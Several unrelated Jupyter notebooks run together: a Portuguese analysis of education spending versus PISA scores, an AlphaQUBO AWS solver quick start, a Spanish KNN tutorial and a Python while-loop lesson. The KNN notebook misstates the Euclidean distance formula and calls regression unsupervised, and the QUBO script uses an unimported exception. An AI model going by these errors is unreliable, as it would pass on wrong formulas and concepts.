plt.rcParams['axes.edgecolor'] = grey
plt.rcParams['xtick.color'] = grey
plt.rcParams['ytick.color'] = grey
```
---
## <font color='#82ad32'>1. Input das Bases
```
# Gasto Público em Educação
gp_educ = pd.read_csv('gasto_publico_educ_00-15.csv')
# Desempenho no PISA
# Matemática
pisa_m = pd.read_csv('pisa_mat_03-18.csv')
# Leitura
pisa_l = pd.read_csv('pisa_leitura_00-18.csv')
# Ciência
pisa_c = pd.read_csv('pisa_sci_06-18.csv')
# Chaves para cruzar os dados com seus paises e Continentes
gapminder_keys = px.data.gapminder()[['country',
'continent',
'iso_alpha']
].drop_duplicates().reset_index(drop=True)
```
---
## <font color='#82ad32'>2. Tratamento das Bases
```
#Selecionando apenas colunas pertinentes
gp_educ.drop(['INDICATOR','SUBJECT','MEASURE','FREQUENCY','Flag Codes'],axis=1,inplace=True)
pisa_m.drop( ['INDICATOR','SUBJECT','MEASURE','FREQUENCY','Flag Codes'],axis=1,inplace=True)
pisa_l.drop( ['INDICATOR','SUBJECT','MEASURE','FREQUENCY','Flag Codes'],axis=1,inplace=True)
pisa_c.drop( ['INDICATOR','SUBJECT','MEASURE','FREQUENCY','Flag Codes'],axis=1,inplace=True)
#Com isso, todas as bases contêm apenas o nome do país, o valor do indicador e o ano.
#Renomeando as colunas para maior comodidade
gp_educ.columns = ['country','Ano','Gasto Educ (%)']
pisa_m.columns = ['country','Ano','Nota Matemática']
pisa_l.columns = ['country','Ano','Nota Leitura']
pisa_c.columns = ['country','Ano','Nota Ciências']
gapminder_keys.columns = ['País', 'Continente', 'country'] # country vira o iso_alpha
#Avaliando se as colunas estão sendo lidas corretamente. Ano e Valor devem ser lidos como números inteiros (int)
#ou fracionados (float)
print(gp_educ.dtypes)
print()
print(pisa_m.dtypes)
print()
print(pisa_c.dtypes)
print()
print(pisa_l.dtypes)
```
---
## <font color='#82ad32'>3. Unificação das Bases
```
#Para unificar as bases, precisamos de uma coluna para usar de referência. Como os valores fazem referência a um país e a um ano
#simultaneamente, vamos concatenar a coluna país com a coluna ano. Com isso, essa coluna concatenada poderá ser usada para
#cruzar as bases sem perda de informação.
gp_educ['País-Ano'] = gp_educ['country'] + '-' + gp_educ['Ano'].astype(str)
pisa_m['País-Ano'] = pisa_m['country'] + '-' + pisa_m['Ano'].astype(str)
pisa_l['País-Ano'] = pisa_l['country'] + '-' + pisa_l['Ano'].astype(str)
pisa_c['País-Ano'] = pisa_c['country'] + '-' + pisa_c['Ano'].astype(str)
#Concatenando as bases
base = pd.concat([gp_educ,pisa_m,pisa_l,pisa_c],axis=0,sort=False)
#Com isso, a variável 'base' estará agrupada, mas terá valores repetidos para o país-ano
#(duas linhas para Brasil-2005, por exemplo)
#Para termos apenas um valor para cada país-ano, vamos agrupar a base na coluna País-Ano utilizando como função a mínimo.
#Poderíamos aqui utilizar outras funções que não a mínimo, pois só existe 1 valor de cada indicador para cada país-ano.
#Se fizessemos a função max(), por exemplo, o resultado seria o mesmo, pois o mínimo de [nan,nan,x] é igual ao
#máximo de [nan,nan,x], já que só possui um valor - nan não conta.
base_group = base.groupby('País-Ano').min()
base_group = base_group.merge(gapminder_keys, on='country', how='left')
```
---
## <font color='#82ad32'>4. Análise Exploratória dos Dados
Vamos ver quantos lançamentos existem por continente.
```
base_group.groupby(['País',
'Continente'],
as_index=False).count()[['País',
'Continente']].groupby('Continente').count()
```
Conforme pode ser visto, a maior parte dos países é europeu. Também vimos que no caso da África existe apenas 1 país, apesar do continente possuir bem mais. Por isso, decidimos omitir a África da base - além de possuir apenas 1, o país em questão é a África do Sul, que é [o terceiro país mais rico do continente](https://en.wikipedia.org/wiki/List_of_African_countries_by_GDP_(nominal)) e portanto não é representativo.
```
base_group = base_group[base_group['Continente']!='Africa']
```
Feito isso, vamos buscar entender o comportamento das bases. Antes de mais nada, veremos quais são as estatísticas descritivas.
```
base_group.describe()[['Gasto Educ (%)', 'Nota Matemática', 'Nota Leitura','Nota Ciências']]
```
Percebemos que o count das colunas não é igual. Isto significa que não existem todos os indicadores, todos os anos para todos os países. Isto é um problema, pois implica que precisaremos lidar com esses espaços vazios.
Quanto ao Gasto Público em educação, percebemos que existe uma amplitude grande - de 1.5% à 5.1% de investimento -, com uma média de 3.29%
Já as notas do PISA possuem médias muito parecidas, entre 485 e 490 pontos. Também possuem distribuições muito similares.
```
base_group_country = base_group.groupby(['País','country']).mean().reset_index()
#Vamos visualizar as distribuições dessas colunas.
fig = plt.figure(figsize=(20,10))
#Gerando um espaço de imagem do matplotlib
gs = gridspec.GridSpec(3, 3, wspace=0.2, hspace=0.3,figure=fig)
#Criando os sub-espaços (1 maior, e 3 menores)
#No código abaixo estamos forçando os gráficos do PISA a terem todos os mesmo eixo X.
ax0 = fig.add_subplot(gs[0, 1:])
plt.xticks(fontsize=9)
plt.title('Nota em Matemática')
ax1 = fig.add_subplot(gs[1, 1:])
plt.xticks(fontsize=9)
plt.title('Nota em Leitura')
ax2 = fig.add_subplot(gs[2, 1:])
plt.xticks(fontsize=9)
plt.title('Nota em Ciências')
ax3 = fig.add_subplot(gs[:, 0])
plt.yticks([])
plt.xticks([x/100 for x in range(0,700,50)])
plt.title('Gasto Público em Educação (% do PIB)')
ax0.axes.get_xaxis().get_label().set_visible(False)
ax1.axes.get_xaxis().get_label().set_visible(False)
ax2.axes.get_xaxis().get_label().set_visible(False)
ax0.axes.get_yaxis().get_label().set_visible(False)
ax1.axes.get_yaxis().get_label().set_visible(False)
ax2.axes.get_yaxis().get_label().set_visible(False)
ax3.axes.get_yaxis().get_label().set_visible(False)
#Plotando os gráficos de distribuição.
g3 = sns.barplot(data=base_group_country.sort_values('Gasto Educ (%)',ascending=False)[:7],x='Gasto Educ (%)',y='País',
ci=0,ax=ax3,palette=sns.color_palette("OrRd", 10)[::-1])
g3.tick_params(axis="y",direction="out", pad=-100,colors='white',labelsize=15)
g0 = sns.barplot(data=base_group_country.sort_values('Nota Matemática',ascending=False)[:5],y='Nota Matemática',x='País',
ax=ax0,palette=sns.color_palette("YlGn", 10)[3:][::-1])
g0.tick_params(axis="x",direction="out", pad=-75,colors='white',labelsize=11)
g1 = sns.barplot(data=base_group_country.sort_values('Nota Leitura',ascending=False)[:5],y='Nota Leitura',x='País',
ax=ax1,palette=sns.color_palette("PuBu", 10)[5:][::-1])
g1.tick_params(axis="x",direction="out", pad=-75,colors='white',labelsize=11)
g2 = sns.barplot(data=base_group_country.sort_values('Nota Ciências',ascending=False)[:5],y='Nota Ciências',x='País',
ax=ax2,palette=sns.color_palette("YlOrBr", 10)[5:][::-1])
g2.tick_params(axis="x",direction="out", pad=-75,colors='white',labelsize=11)
fig.suptitle('Países com Maiores Valores',fontsize=20)
plt.show()
base_group_country = base_group.groupby(['País','country']).mean().reset_index()
#Vamos visualizar as distribuições dessas colunas.
fig = plt.figure(figsize=(20,10))
#Gerando um espaço de imagem do matplotlib
gs = gridspec.GridSpec(3, 3, wspace=0.2, hspace=0.3,figure=fig)
#Criando os sub-espaços (1 maior, e 3 menores)
#No código abaixo estamos forçando os gráficos do PISA a terem todos os mesmo eixo X.
ax0 = fig.add_subplot(gs[0, 1:])
plt.xticks(fontsize=9)
plt.title('Nota em Matemática')
ax1 = fig.add_subplot(gs[1, 1:])
plt.xticks(fontsize=9)
plt.title('Nota em Leitura')
ax2 = fig.add_subplot(gs[2, 1:])
plt.xticks(fontsize=9)
plt.title('Nota em Ciências')
ax3 = fig.add_subplot(gs[:, 0])
plt.yticks([])
plt.xticks([x/100 for x in range(0,700,50)])
plt.title('Gasto Público em Educação (% do PIB)')
ax0.axes.get_xaxis().get_label().set_visible(False)
ax1.axes.get_xaxis().get_label().set_visible(False)
ax2.axes.get_xaxis().get_label().set_visible(False)
ax0.axes.get_yaxis().get_label().set_visible(False)
ax1.axes.get_yaxis().get_label().set_visible(False)
ax2.axes.get_yaxis().get_label().set_visible(False)
ax3.axes.get_yaxis().get_label().set_visible(False)
#Plotando os gráficos de distribuição.
g3 = sns.barplot(data=base_group_country.sort_values('Gasto Educ (%)',ascending=True)[:7],x='Gasto Educ (%)',y='País',
ci=0,ax=ax3,palette=sns.color_palette("OrRd", 10)[3:])
g3.tick_params(axis="y",direction="out", pad=-155,colors='white',labelsize=15)
g0 = sns.barplot(data=base_group_country.sort_values('Nota Matemática',ascending=True)[:5],y='Nota Matemática',x='País',
ax=ax0,palette=sns.color_palette("YlGn", 10)[5:])
g0.tick_params(axis="x",direction="out", pad=-75,colors='white',labelsize=14)
g1 = sns.barplot(data=base_group_country.sort_values('Nota Leitura',ascending=True)[:5],y='Nota Leitura',x='País',
ax=ax1,palette=sns.color_palette("PuBu", 10)[5:])
g1.tick_params(axis="x",direction="out", pad=-75,colors='white',labelsize=14)
g2 = sns.barplot(data=base_group_country.sort_values('Nota Ciências',ascending=True)[:5],y='Nota Ciências',x='País',
ax=ax2,palette=sns.color_palette("YlOrBr", 10)[5:])
g2.tick_params(axis="x",direction="out", pad=-75,colors='white',labelsize=14)
fig.suptitle('Países com Menores Valores',fontsize=20)
plt.show()
#Vamos visualizar as distribuições dessas colunas.
fig = plt.figure(figsize=(12,6))
#Gerando um espaço de imagem do matplotlib
gs = gridspec.GridSpec(3, 2, wspace=0.2, hspace=0.6,figure=fig)
#Criando os sub-espaços (1 maior, e 3 menores)
#No código abaixo estamos forçando os gráficos do PISA a terem todos os mesmo eixo X.
ax0 = fig.add_subplot(gs[0, 1])
plt.yticks([])
plt.yticks([])
plt.title('Nota em Matemática')
plt.setp(ax0.get_xticklabels(), visible=False)
ax1 = fig.add_subplot(gs[1, 1],sharex=ax0)
plt.yticks([])
plt.title('Nota em Leitura')
plt.setp(ax1.get_xticklabels(), visible=False)
ax2 = fig.add_subplot(gs[2, 1],sharex=ax0)
plt.yticks([])
plt.title('Nota em Ciências')
ax3 = fig.add_subplot(gs[:, 0])
plt.yticks([])
plt.xticks([x/100 for x in range(100,700,50)])
plt.title('Gasto Público em Educação (% do PIB)')
#Plotando os gráficos de distribuição.
sns.distplot(base_group['Gasto Educ (%)'],ax=ax3,hist=False,axlabel=False,kde_kws={"shade": True},color='#342d36')
sns.distplot(base_group['Nota Matemática'],ax=ax0,hist=False,axlabel=False,kde_kws={"shade": True},color='#eb8989')
sns.distplot(base_group['Nota Leitura'],ax=ax1,hist=False,kde_kws={"shade": True},axlabel=False)
sns.distplot(base_group['Nota Ciências'],ax=ax2,hist=False,axlabel=False,kde_kws={"shade": True},color='#62e571')
fig.suptitle('Distribuição das Variáveis',fontsize=20)
plt.show()
```
As visualizações estatísticas mostram que as variáveis para as notas são parecidas. Vamos verificar a correlação entre elas.
```
mask = np.zeros_like(base_group[['Gasto Educ (%)','Nota Leitura','Nota Matemática','Nota Ciências']].corr(), dtype=np.bool)
mask[np.triu_indices_from(mask)] = True
mask[np.diag_indices_from(mask)] = False
fig, ax = plt.subplots()
sns.heatmap(base_group[['Gasto Educ (%)','Nota Leitura','Nota Matemática','Nota Ciências']].corr(), annot=True,
cmap='Blues',fmt='.2g',linewidths=1,square=False,ax=ax,cbar=False,mask=mask)
cbar = fig.colorbar(ax.get_children()[0],shrink=0.6)
cbar.ax.set_title('Corr. Pearson',fontsize=9,pad=12)
fig.subplots_adjust(left=0.2)
plt.xticks(rotation=20)
plt.title('Mapa de Calor das Correlações entre Variáveis',fontsize=16)
plt.show()
```
De fato, o comportamento das colunas é bastante correlacionado. Por isso, de agora em diante, com pouca perda de generalidade, vamos simplificar e criar uma coluna única de nota.
```
base_group['Nota Média'] = np.mean(base_group[['Nota Leitura','Nota Matemática','Nota Ciências']],axis=1)
#Vamos visualizar as distribuições dessas colunas.
fig = plt.figure(figsize=(12,6))
#Gerando um espaço de imagem do matplotlib
gs = gridspec.GridSpec(3, 2, wspace=0.2, hspace=0.4,figure=fig)
#Criando os sub-espaços (1 maior, e 3 menores)
#No código abaixo estamos forçando os gráficos do PISA a terem todos os mesmo eixo X.
ax0 = fig.add_subplot(gs[:, 1])
plt.yticks([])
plt.yticks([])
plt.title('Nota Média')
ax3 = fig.add_subplot(gs[:, 0])
plt.yticks([])
plt.xticks([x/100 for x in range(100,700,50)])
plt.title('Gasto Público em Educação (% do PIB)')
#Plotando os gráficos de distribuição.
sns.distplot(base_group['Gasto Educ (%)'],ax=ax3,hist=False,axlabel=False,kde_kws={"shade": True},color='#342d36')
sns.distplot(base_group['Nota Média'],ax=ax0,hist=False,axlabel=False,kde_kws={"shade": True},color='#eb8989')
fig.suptitle('Distribuição das Variáveis',fontsize=20)
plt.show()
```
Percebemos também que a distribuição da média das notas é bimodal. O que isso nos indica é que existe mais de uma realidade na base. Por mais que a maioria dos países siga um comportamento denotado pelo grande pico, as caudas possuem uma segunda moda, o que denota uma segunda realidade.
Um possível motivo para essa distribuição bimodal é a presença de vários países europeus na base. Conforme já vimos anteriormente, a Europa é o continente com mais registros e, portanto, pode ser a responsável por distorcer as distribuições. Vamos então analisar as distribuições abertas por continente.
```
#Plotando gráficos de distribuição abertos por continente.
f,ax = plt.subplots(2,figsize=[10.5,5.5])
sns.violinplot(x="Continente", y="Gasto Educ (%)", data=base_group,
showfliers = False,ax=ax[0])
ax[0].set_xlabel('')
ax[0].set_xticks([])
ax[0].grid(axis='y', ls=':')
ax[1].grid(axis='y', ls=':')
sns.violinplot(x="Continente", y="Nota Média", data=base_group,
showfliers = False,ax=ax[1])
plt.tight_layout()
plt.show()
```
Os gráficos de distribuição acima mostram claramente que existem várias realidades nos países. Tanto em termos de desempenho no PISA quanto gasto em educação a Ásia se destaca por possuir duas realidades diferentes. Uma parcela dos países investe em educação e desempenha muito bem, e uma outra parcela não. As Américas possuem uma situação similar a da Ásia, também.
Por fim, como última visualização desta seção, analisaremos as variáveis no tempo.
```
f,ax = plt.subplots(2,figsize=(12,5),sharex=True)
sns.lineplot(data=base_group[base_group['Ano']<=2015],x='Ano',y='Gasto Educ (%)',ax=ax[1],hue='Continente',ci=0,
legend=False,linewidth=3.5)
sns.lineplot(data=base_group[base_group['Ano']<=2015],x='Ano',y='Nota Média',ax=ax[0],hue='Continente',ci=0,linewidth=3.5)
ax[1].set_xticks([x for x in range(2000,2016)])
ax[1].set_xlabel('')
ax[1].grid(axis='y', ls=':')
ax[0].legend(bbox_to_anchor=(1.05, 0), loc='center left', borderaxespad=0.)
ax[0].grid(axis='y', ls=':')
sns.despine(left=True)
f.suptitle('Evolução da Educação nos Continentes',fontsize=20)
plt.show()
```
Percebemos que na maioria dos continentes houve um crescimento na fração do PIB investida em educação. Apesar disso, nesses mesmos continentes o desempenho dos alunos no PISA não correspondeu. Suspeitamos que o aumento na fração do PIB investida em educação na realidade não represente um aumento em termos reais. O motivo para essa suspeita foi o aumento brusco que ocorreu em todos os continentes entre os anos de 2008 e 2009, momento no qual o mundo viveu uma grande crise financeira. Os PIBs mundiais podem ter diminuido, aumentando a fração gasta em educação para um nível fixo do gasto.
---
# <font color='#82ad32'>5. Correlação entre Gasto Público em Educação x Desempenho no PISA
```
plt.figure(figsize=(12,6))
sns.regplot(data=base_group,x='Gasto Educ (%)',y='Nota Média',color='#82ad32',marker='+',ci=0,
scatter_kws={'alpha':0.75})
plt.title('Gráfico de Dispersão do Gasto em Educação (% do PIB) x Nota Média no PISA',fontsize=16)
plt.show()
```
| github_jupyter |
# AlphaQUBO Quick Start
This quick start shows how to invoke AlphaQUBO in AWS and retrieve the results. We will invoke the QUBO solver with the problem definition in S3 and wait for the solution to be populated in S3.
```
import sys
import time
import meta_analytics
from meta_analytics.api import qubo_api
from meta_analytics.model.solver_api import SolverAPI
from meta_analytics.model.solver_async_request import SolverAsyncRequest
from meta_analytics.model.solver_async_response import SolverAsyncResponse
import boto3
import boto3.session
# Define the location for the API of the AlphaQUBO solver.
# If you are using the ECS configuration provided for CloudFormation, the URL is
# the value of the 'ExternalURL' output parameter of the stack.
configuration = meta_analytics.Configuration(
# host = "<Enter AlphaQUBO URL here.>"
host = "http://forec-Publi-1753ZFGPX8JE3-383765963.us-west-2.elb.amazonaws.com"
)
# We will be using S3 to load the QUBO problems into the solver. The credentials
# for the AWS account can be hard coded in the script. However, it is recommended
# credentials are encoded as described at:
# https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-files.html
#
# The primary reason for removing credentials from this script is security.
s3 = boto3.resource('s3')
s3client = boto3.client('s3')
# Prepare to call AlphaQUBO API -- this can be condensed to one line, however,
# is left seperate for clarity.
api_client = meta_analytics.ApiClient(configuration)
api_instance = qubo_api.QuboApi(api_client)
try:
# Heartbeat -- Used to verify the container is running.
# On success, there will be no exception thrown. Under the hood, the heartbeat API
# returns a 200 HTTP response. The expected output from the print statement is
# 'None'
# On failure, an exception is printed
heartbeat_response = api_instance.api_qubo_heartbeat_get()
print (heartbeat_response)
except meta_analytics.ApiException as e:
print("Exception when calling QuboApi->api_qubo_heartbeat_get: %s\n" % e)
# Define where the QUBO problem resides in S3 as well as where the solution should be placed.
# The bucket and key must be in S3 available via your crednentials.
bucket_name="qubotests"
key_name="qci-mqlib/g000283.txt.gz"
solution_bucket_name="qubotests"
solution_key_name="qci-mqlib/rajesh.g000283.txt.gz.out"
# Ensure there is solution bucket / key combination do not already exist
try:
obj = s3.Object(solution_bucket_name, solution_key_name)
delete_response = obj.delete()
except ClientError as e:
print(e)
# Now let's invoke the AlphaQUBO solver with the QUBO definition in S3.
# For clarity, we fill in the SolverAsyncRequest seperately than invoking the API.
solver_async_request = SolverAsyncRequest(
bucket_name=bucket_name,
key_name=key_name,
solution_bucket_name=solution_bucket_name,
solution_key_name=solution_key_name,
region="us-west-2",
num_vars=1,
min_max=1,
non_zero=0,
timeout=20,
parameters="",
)
try:
# Use the inputs to locate a file in S3 and solve the QUBO within it.
# The file may be a .txt file or a .gz file.
api_response = api_instance.api_qubo_solve_qubo_async_using_s3_post(solver_async_request=solver_async_request)
print(api_response)
except meta_analytics.ApiException as e:
print("Exception when calling QuboApi->api_qubo_solve_qubo_async_using_s3_post: %s\n" % e)
def get_filesize_if_exists(client, bucket, key):
"""return the key's size if it exist, else None"""
response = client.list_objects_v2(
Bucket=bucket,
Prefix=key,
)
#print(response)
for obj in response.get('Contents', []):
if obj['Key'] == key:
return obj['Size']
print("Waiting for AlpahQUBO to create a solution", end="")
solution_size = get_filesize_if_exists(s3client, solution_bucket_name, solution_key_name)
while solution_size == None:
time.sleep(3)
solution_size = get_filesize_if_exists(s3client, solution_bucket_name, solution_key_name)
print(".", end = "")
print("Solution found or timeout expired for AlphaQUBO solver.")
try:
obj = s3.Object(solution_bucket_name, solution_key_name)
body = obj.get()['Body'].read()
except botocore.exceptions.ClientError as e:
if e.response['Error']['Code'] == "404":
print("The object does not exist.")
print(body)
```
| github_jupyter |
## K Nearest Neighbors (KNN) o K Vecinos más Cercanos
Este algoritmo cuyo nombre puede ser traducido como K Vecinos más Cercanos puede ser utilizado para resolver problemas de clasificación (aprendizaje supervisado) o de regresión/clusterización (aprendizaje no supervisado).
Para un ejemplo supervisado podemos revisar el notebook previo (Precisión vs Cobertura) en donde el dataset empleado cuenta con un atributo o columna que representa a una variable categórica (tipo Factor en R). En esta ocasión abordaremos un problema de regresión, "clusterización" o de aprendizaje no supervisado.
Primero cargamos las bibliotecas y el dataset que será utilizado.
```
#Loading libraries
import pandas as pd
import numpy as np
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
from sklearn.preprocessing import MinMaxScaler
from sklearn.neighbors import KNeighborsClassifier
from sklearn.neighbors import KNeighborsRegressor
from sklearn.metrics import confusion_matrix
from sklearn.metrics import classification_report
from sklearn.metrics import roc_curve
from sklearn.metrics import roc_auc_score
from sklearn.metrics import precision_recall_curve
from sklearn.metrics import auc
from sklearn.metrics.pairwise import manhattan_distances
from sklearn.metrics import mean_squared_error
from math import sqrt
import matplotlib.pyplot as plt
import seaborn as sns
%matplotlib inline
```
## Dataset
El dataset con el que trabajaremos, consta de únicamente variables o atributos numéricos (más allá de si son discretos o continuos). Las variables de input o independientes serán la altura y la edad, mientras que nuestra variable a predecir o target será el peso. Es importante mencionar que la naturaleza de la variable de target determina si el problema de aprendizaje es de regresión o de clasificación, por lo que un dataset en donde tuviéramos atributos categóricos y quisieramos predecir una variable numérica igualmente caería en la categoría de no supervisado.
**OBSÉRVESE QUE EN LA ÚLTIMA FILA SE TIENE UNA OBSERVACIÓN CUYO PESO ES DESCONOCIDO**
```
# Loading datasets
db = pd.read_csv("datasets/alturas_pesos.csv")
db
```
A continuación separamos nuestro dataset en un conjunto de entrenamiento constituido por las primeras 10 filas y un conjunto de prueba que cuenta únicamente con una observación. En este ejemplo concreto este paso en realidad es simbólico ya que lo que se quiere mostrar es cómo el algoritmo predice valores numéricos.
```
prediction = db.iloc[10,:]
data = db.iloc[0:10,:]
train = data.iloc[0:7,:]
test = data.iloc[7:10,:]
x = train['ALTURA']
y = train['EDAD']
labels = train['PESO']
```
Si graficamos nuestros datos podremos observar cómo se distribuyen las observaciones en el espacio N-Dimensional de atributos o variables independientes. Por otra parte podemos observar el punto amarillo que representa la observación cuyo valor de peso deseamos estimar.
```
fig,ax = plt.subplots()
ax.set_title("ALTURA VS EDAD")
ax.scatter(x,y)
ax.scatter(test['ALTURA'],test['EDAD'])
for i,label in enumerate(labels):
ax.annotate(label, (x[i],y[i]), )
plt.show()
```
## Supuesto:
El supuesto más importante de KNN puede resumirse en que "observaciones cercanas en el espacio de atributos tienen una valor similar en la variable de target". Dicho supuesto da pie a que consideremos:
1. Una medida de distancia que nos permita definir "cercano" mediante el establecimiento de un umbral (en este caso esto se controla mediante el valor de K)
2. Un criterio para una vez dado este "radio" observar a los veciones dentro del mismo y determinar el valor de target que la observación objetivo debe de tener.
### 1. Calculando la distancia del punto objetivo a los demás puntos
El primer paso consiste en definir una medida de distancia para medir la cercanía de un punto a sus vecinos.
Algunas medidas de distancia comúnmente empleadas son la distancia euclidiana, la distancia Manhattan (ambas conocidas como Distancia de orden 2 y Distancia de orden 1 de Minkowsky respectivamente), la distancia de Hamming o la distancia de Jaccard (estas últimas dos son de suma utilidad en Procesamiento del Lenguaje Natural).
**Distancia euclidiana (Distancia 2 de Minkowsky)**
$d(\vec{x},\vec{y})~=~\sum\sqrt{|x_i-y_i|}~=~\sum(|x_i-y_i|)^{1\over2}$
**Distancia Manhattan (Distancia 1 de Minkowsky)**
$d(\vec{x},\vec{y})~=~\sum|x_i-y_i|~=~\sum(|x_i-y_i|)^{1\over1}$
**Distancia de Hamming (para variables categóricas)**
$d(\vec{x},\vec{y})~=~\sum{h_i}$
donde $~h_i=0~$ si $~x_i=y_i~$ y $~h_i=1~$ si $~x_i\neq y_i~$
**Distancia de Jaccard (para variables categóricas, palabras o conjuntos, puede aplicarse a vectores o conjuntos de distinto tamaño)**
$d(X,Y)~=~1-$${|X\bigcap Y|}\over{|X\bigcup Y|}$
A continuación procederemos a calcular las 2 primeras distancias mencionadas para aplicar el algoritmo y notar sus diferencias (¿pueden calcularse las segundas 2 distancias en este data set?, ¿si no se puede, podrías hacer algo para que se pudiera?):
```
train_input = train.iloc[:,0:2].to_numpy()
test_input = test.iloc[0,0:2].to_numpy().reshape(1,-1)
dist_eucl = [np.linalg.norm(test_input-train_point) for train_point in train_input]
dist_manh = manhattan_distances(test_input,train_input)[0]
df = pd.DataFrame(list(zip(dist_eucl, dist_manh)),
columns =['EUCLIDEAN', 'MANHATTAN'])
df.describe()
```
## Ya que tenemos las distancias computadas, ¿cómo decidimos el valor de K?
Para elegir el valor de k óptimo podemos utilizar la tasa de error obtenida sobre el conjunto de prueba, para así elegir aquella donde encontremos el valor más pequeño. Para esto aplicaremos el algoritmo probando varios valores de k y en función de ello determinaremos aquella que minimice el error en el conjunto de prueba.
```
x_train = train.drop('PESO', axis=1)
y_train = train['PESO']
x_test = test.drop('PESO', axis=1)
y_test = test['PESO']
scaler = MinMaxScaler(feature_range=(0, 1))
x_train_scaled = scaler.fit_transform(x_train)
x_train = pd.DataFrame(x_train_scaled)
x_test_scaled = scaler.fit_transform(x_test)
x_test = pd.DataFrame(x_test_scaled)
rmse_val = [] #to store rmse values for different k
for K in range(7):
K = K+1
model = KNeighborsRegressor(n_neighbors = K)
model.fit(x_train, y_train) # fit the model
pred=model.predict(x_test) # make prediction on test set
error = sqrt(mean_squared_error(y_test,pred)) # calculate RMSE (Residuals Mean Squared Error)
rmse_val.append(error) #store RMSE
print('RMSE value for k= ' , K , 'is:', error)
curve = pd.DataFrame(rmse_val) #elbow curve
curve.plot()
```
Con base en la gráfica anterior podemos concluir que el valor de K que minimiza el MSE es K = 3. Ahora procederemos a construir el modelo para esta K y predeciremos la observación faltante en el dataset original.
```
prediction
model = KNeighborsRegressor(n_neighbors = 3)
model.fit(data.iloc[:,0:2],data.iloc[:,2])# Data not rescaled
model.predict(prediction[0:2].to_numpy().reshape(1,-1))
```
Por lo que recordando los datos originales tendríamos que para una persona de 5.50 ft de altura y 38 años su peso estimado sería de 63.67 kg.
```
db
```
## ¿Cómo predice (variable numérica) o clasifica (variable categórica) KNN?
Si estamos ante un problema de regresión o de aprendizaje no supervisado KNN utiliza a los K vecinos más cercanos para utilizar el valor que presentan en la variable target y mediante un promedio asignar el valor correpondiente a la nueva observación.
**OBSERVACIÓN: Podríamos utilizar la mediana en lugar del promedio dependiendo de la distribución de los K datos considerados.**
Si estamos ante un problema de clasificación o de aprendizaje supervisado KNN asigna por democracia el valor de la variable target, o la categoría, esto lo hace considerando la moda obtenida al considerar a los K vecinos más cercanos y observar la categoría a la que pertenece cada uno.
Ahora bien pensando en el problema antes presentado ¿convendría pensar en otros métodos de regresión o estimación?
La regresión lineal clásica puede brindar un método con el cual contrastar los resultados del modelo anterior. Recordemos que encontramos un MSE para K = 3, por lo que podríamos conocer el MSE obtenido mediante un modelo de regresión lineal clásico y ver en qué caso obtenemos un valor menor. Sin embargo dicho método lo veremos en un siguiente notebook.
| github_jupyter |
## User Input and While Loops
Most programs are written to solve an end user’s problem. To do so, you usually need to get some information from the user.
### How the input() Function Works
The `input()` built-in function pauses your program and waits for the user to enter some text.
When you use the input() function, Python interprets everything the user enters as a string.
```
message = input("Tell me something, and I will repeat it back to you: ")
print(message + " type:" + str(type(message)))
```
### Using int() to Accept Numerical Input
```
height = input("How tall are you, in inches? ")
height = int(height)
if height >= 36:
print("\nYou're tall enough to ride!")
else:
print("\nYou'll be able to ride when you're a little older.")
```
### Introducing while Loops
```
current_number = 1
while current_number <= 5:
print(current_number, end=" ")
current_number += 1
```
### Letting the User Choose When to Quit
```
prompt = "\nTell me something, and I will repeat it back to you:"
prompt += "\nEnter 'quit' to end the program. "
message = ""
while message != 'quit':
message = input(prompt)
if message != 'quit':
print(message)
```
### Using a Flag
For a program that should run only as long as many conditions are true, you can define one variable that determines whether or not the entire program is active. This variable, called a flag, acts as a signal to the program. We can write our programs so they run while the flag is set to True and stop running when any of several events sets the value of the flag to False.
As a result, our overall while statement needs to check only one condition: whether or not the flag is currently True.
```
prompt = "\nTell me something, and I will repeat it back to you:"
prompt += "\nEnter 'quit' to end the program. "
active = True
while active:
message = input(prompt)
if message == 'quit':
active = False
else:
print(message)
```
### Using break to Exit a Loop
To exit a while loop immediately without running any remaining code in the loop, regardless of the results of any conditional test, use the break statement.
You can use the break statement in any of Python’s loops. For example, you could use break to quit a for loop that’s working through a list or a dictionary.
```
prompt = "\nPlease enter the name of a city you have visited:"
prompt += "\n(Enter 'quit' when you are finished.) "
while True:
city = input(prompt)
if city == 'quit':
break
else:
print("I'd love to go to " + city.title() + "!")
```
### Using continue in a Loop
You can use the continue statement to return to the beginning of the loop based on the result of a conditional test.
```
current_number = 0
while current_number < 10:
current_number += 1
if current_number % 2 == 0:
continue
print(current_number)
```
## Using a while Loop with Lists and Dictionaries
For loop is effective for looping through a list, but you shouldn’t modify a list inside a for loop because Python will have trouble keeping track of the items in the list.
To modify a list as you work through it, use a while loop.
Using while loops with lists and dictionaries allows you to collect, store, and organize lots of input to examine and report on later.
```
# Start with users that need to be verified,
# and an empty list to hold confirmed users.
unconfirmed_users = ['alice', 'brian', 'candace']
confirmed_users = []
# Verify each user until there are no more unconfirmed users.
# Move each verified user into the list of confirmed users.
while unconfirmed_users:
current_user = unconfirmed_users.pop()
print("Verifying user: " + current_user.title())
confirmed_users.append(current_user)
# Display all confirmed users.
print("\nThe following users have been confirmed:")
for confirmed_user in confirmed_users:
print(confirmed_user.title())
```
### Removing All Instances of Specific Values from a List
The remove() method searches for the given element in the list and removes the first matching element.
```
pets = ['dog', 'cat', 'dog', 'goldfish', 'cat', 'rabbit', 'cat']
print(pets)
while 'cat' in pets:
pets.remove('cat')
print(pets)
```
### Filling a Dictionary with User Input
```
responses = {}
# Set a flag to indicate that polling is active.
polling_active = True
while polling_active:
# Prompt for the person's name and response.
name = input("\nWhat is your name? ")
response = input("Which mountain would you like to climb someday? ")
# Store the response in the dictionary:
responses[name] = response
# Find out if anyone else is going to take the poll.
repeat = input("Would you like to let another person respond? (yes/ no) ")
if repeat == 'no':
polling_active = False
# Polling is complete. Show the results.
print("\n--- Poll Results ---")
for name, response in responses.items():
print(name + " would like to climb " + response + ".")
```
## Try it Yourself
**1. Multiples of Ten**
Ask the user for a number, and then report whether the number is a multiple of 10 or not.
**2.Deli**
Make a list called sandwich_orders and fill it with the names of various sandwiches. Then make an empty list called finished_sandwiches. Loop through the list of sandwich orders and print a message for each order, such as I made your tuna sandwich. As each sandwich is made, move it to the list of finished sandwiches.
After all the sandwiches have been made, print a message listing each sandwich that was made.
**3. No Pastrami**
Using the list sandwich_orders from the previous exercise, make sure the sandwich 'pastrami' appears in the list at least three times. Add code near the beginning of your program to print a message saying the deli has run out of pastrami, and then use a while loop to remove all occurrences of 'pastrami' from sandwich_orders.
